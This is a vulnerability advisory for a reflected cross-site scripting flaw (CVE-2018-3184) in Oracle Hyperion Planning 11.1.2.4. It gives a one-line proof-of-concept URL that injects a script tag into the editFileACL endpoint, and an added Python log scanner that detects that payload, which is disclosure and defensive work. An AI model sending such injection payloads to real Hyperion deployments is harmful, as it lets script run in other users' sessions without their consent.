Oracle Hyperion Planning 11.1.2.4 Cross Site Scripting

2018.10.27
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 3.5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 6.8/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Single time
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

# Exploit Title: Oracle Hyperion Planning, 11.1.2.4 Vulnerable to Cross Site Scripting
# Date: 2018-10-16
# Exploit Author: Hasan Alqawzai
# Vendor Homepage: https://www.oracle.com
# Software Link: https://www.oracle.com/applications/performance-management/products/financial-close-reporting/hyperion-financial-management/
# Version: 11.1.2.4
# Tested on: Windows
# CVE : CVE-2018-3184
# Description : A cross-site scripting issue was detected, which allows an attacker to execute a dynamic script in the context of the application.
# Prerequisites : Access to Oracle Hyperion
# PoC Exploit: XSS
https://examble.com/raframework/browse/editFileACL?dest=0000016f77a61591-1111-3dfd-c9ao0p1b&tempPersistIdFN=1525";</script><script>alert(/hasan/)</script>
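
A detection sketch for the request pattern in the PoC, added here as an example and not part of the original advisory: it scans access-log lines for requests to editFileACL whose tempPersistIdFN value, after nested percent-encoding is undone, contains characters that can close a quoted string or a script block. The combined log format, the sample lines and the function names are assumptions made for this example.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

ENDPOINT = "/raframework/browse/editFileACL"  # path from the PoC URL
PARAM = "tempPersistIdFN"                     # parameter named in the PoC
# Characters that can close a quoted string or open/close a tag.
BREAKOUT = re.compile(r"[\"'<>]")
# Request field of a combined-format access log line (assumed format).
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines, not taken from a real system.
SAMPLE_LOG = [
    '10.0.0.5 - alice [16/Oct/2018:10:00:00 +0000] "GET /raframework/browse/editFileACL?dest=0000&tempPersistIdFN=1525 HTTP/1.1" 200 512',
    '10.0.0.9 - bob [16/Oct/2018:10:01:00 +0000] "GET /raframework/browse/editFileACL?dest=0000&tempPersistIdFN=1525%22%3B%3C/script%3E HTTP/1.1" 200 530',
    '10.0.0.9 - bob [16/Oct/2018:10:02:00 +0000] "GET /raframework/browse/editFileACL?dest=0000&tempPersistIdFN=1525%2522%253C%252Fscript%253E HTTP/1.1" 200 530',
    '10.0.0.7 - carol [16/Oct/2018:10:03:00 +0000] "GET /index.html?q=%3Cb%3E HTTP/1.1" 200 100',
]

def fully_decode(value, rounds=3):
    """Undo nested percent-encoding (%253C -> %3C -> <), bounded."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_requests(log_lines):
    """Return (line_number, decoded_value) for each flagged request."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if not url.path.endswith(ENDPOINT):
            continue
        # parse_qsl decodes once; fully_decode handles double encoding.
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            if name == PARAM and BREAKOUT.search(fully_decode(value)):
                hits.append((number, fully_decode(value)))
    return hits

if __name__ == "__main__":
    for number, value in suspicious_requests(SAMPLE_LOG):
        print(f"line {number}: {PARAM}={value!r}")
```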

